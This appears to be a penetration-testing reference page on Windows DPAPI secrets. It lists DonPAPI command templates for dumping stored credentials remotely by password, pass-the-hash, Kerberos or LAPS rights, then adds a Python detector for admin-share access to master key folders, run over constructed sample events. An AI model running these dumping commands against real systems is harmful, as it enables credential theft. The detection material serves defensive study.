# DPAPI secrets

## Overview

Windows uses DPAPI (the Data Protection API) to store sensitive data for various applications, such as Outlook, web browsers and more. Windows also uses DPAPI to store certificates, Wi-Fi credentials, etc.

The DPAPI data is secured by a user-specific master key, which is stored within the user's directory:

`C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SUID_GUID>`

## Remotely Dumping

DPAPI secrets can be dumped **remotely** using DonPAPI. However, a user's password is required.

* <https://github.com/login-securite/DonPAPI>

**Dump all secrets using a domain administrator account (requires local administrator):**

```
DonPAPI <domain>/<user>:<password>@<target>
```

**Dump all secrets using a local administrator account:**

```
DonPAPI -local_auth <user>@<target>
```

**Dump secrets using a user's password hash (Pass-The-Hash attack):**

```
DonPAPI --hashes <LM>:<NT> <domain>/<user>@<target>
```

**Dump secrets using Kerberos:**

```
DonPAPI -k <domain>/<user>@<target>
```

**Dump secrets using a user with LAPS password reading rights:**

```
DonPAPI -laps <domain>/<user>:<password>@<target>
```
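
For detection, the following added example (not part of the original page or of DonPAPI) flags remote access over an administrative share to the master key folder named in the Overview. It assumes Detailed File Share auditing is enabled so that Security event 5145 is logged and that the events are available as dictionaries; the sample events, account names and addresses are constructed.

```python
import re
from collections import defaultdict

# Master key folder from the Overview, relative to a drive admin share (C$).
PROTECT_RE = re.compile(
    r"^Users\\(?P<profile>[^\\]+)\\AppData\\Roaming\\Microsoft\\Protect(?:\\|$)",
    re.IGNORECASE,
)
# Event 5145 records the share as \\*\C$ ; match any drive-letter admin share.
ADMIN_SHARE_RE = re.compile(r"^\\\\\*\\[A-Z]\$$", re.IGNORECASE)

PROTECT = r"\AppData\Roaming\Microsoft\Protect"
SID = r"\S-1-5-21-1111111111-2222222222-3333333333-1104"  # constructed

# Constructed sample events using Security event 5145 field names.
SAMPLE_EVENTS = [
    {"EventID": 5145, "SubjectUserName": "svc_backup", "IpAddress": "192.0.2.50",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\alice" + PROTECT + SID},
    {"EventID": 5145, "SubjectUserName": "svc_backup", "IpAddress": "192.0.2.50",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\bob" + PROTECT},
    {"EventID": 5145, "SubjectUserName": "alice", "IpAddress": "192.0.2.23",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\alice\Documents\q3.docx"},
    {"EventID": 5145, "SubjectUserName": "bob", "IpAddress": "192.0.2.24",
     "ShareName": r"\\*\SYSVOL", "RelativeTargetName": r"corp.example\Policies"},
    {"EventID": 4624, "SubjectUserName": "svc_backup", "IpAddress": "192.0.2.50"},
]


def find_remote_protect_access(events):
    """Map (source IP, account) -> profiles whose Protect folder was touched."""
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 5145:
            continue  # only detailed file share access checks
        if not ADMIN_SHARE_RE.match(ev.get("ShareName") or ""):
            continue  # only drive-letter administrative shares
        m = PROTECT_RE.match(ev.get("RelativeTargetName") or "")
        if m:
            key = (ev.get("IpAddress"), ev.get("SubjectUserName"))
            hits[key].add(m.group("profile").lower())
    return {k: sorted(v) for k, v in hits.items()}


if __name__ == "__main__":
    for (ip, user), profiles in find_remote_protect_access(SAMPLE_EVENTS).items():
        print(f"{user} from {ip} accessed DPAPI master key folders of: {profiles}")
```

One account touching the `Protect` folders of several profiles from a single source address is the pattern worth alerting on.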
